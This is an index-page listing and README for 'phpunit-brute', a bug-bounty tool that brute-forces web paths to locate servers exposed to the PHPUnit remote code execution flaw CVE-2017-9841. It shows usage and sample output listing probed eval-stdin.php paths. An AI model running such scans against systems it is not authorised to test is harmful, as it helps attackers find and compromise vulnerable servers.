Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/randomrobbiebf/phpunit-brute
Tool to try multiple paths for PHPunit RCE CVE-2017-9841
bugbounty cve-2017-9841 phpunit
Last synced: about 1 month ago
- Host: GitHub
- URL: https://github.com/randomrobbiebf/phpunit-brute
- Owner: RandomRobbieBF
- Created: 2020-05-18T20:55:05.000Z (over 4 years ago)
- Default Branch: master
- Last Pushed: 2021-10-18T09:23:05.000Z (about 3 years ago)
- Last Synced: 2023-02-26T09:23:44.353Z (almost 2 years ago)
- Topics: bugbounty, cve-2017-9841, phpunit
- Language: Python
- Homepage:
- Size: 10.7 KB
- Stars: 25
- Watchers: 2
- Forks: 20
- Open Issues: 2
Metadata Files:
- Readme: README.md
README
# phpunit-brute
Tool that tries multiple paths for the PHPUnit RCE (CVE-2017-9841) and logs found paths to `found.txt` in the directory.
It uses the following list of paths: `https://raw.githubusercontent.com/random-robbie/bruteforce-lists/master/phpunit.txt`
If you have a path that is not on the list, please submit a PR.
```
usage: phpunit-brute.py [-h] -u URL [-p PROXY]
phpunit-brute.py: error: the following arguments are required: -u/--url
```

Example
---

```
python3 phpunit-brute.py -u http://someoldwebsite.com
[-] No Luck for /_inc/vendor/stripe/stripe-php/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php [-]
[-] No Luck for /_staff/cron/php/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php [-]
[-] No Luck for /_staff/php/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php [-]
[-] No Luck for /~champiot/Laravel E2N test/tuto_laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php [-]
[-] No Luck for /~champiot/Laravel%20E2N%20test/tuto_laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php [-]
[-] No Luck for /~champiot/tuto_laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php [-]
[-] No Luck for /172410101040/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php [-]
[-] No Luck for /1board/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php [-]
[-] No Luck for /20170811125232/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php [-]
[+] Found RCE for http://someoldwebsite.com/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php [+]
```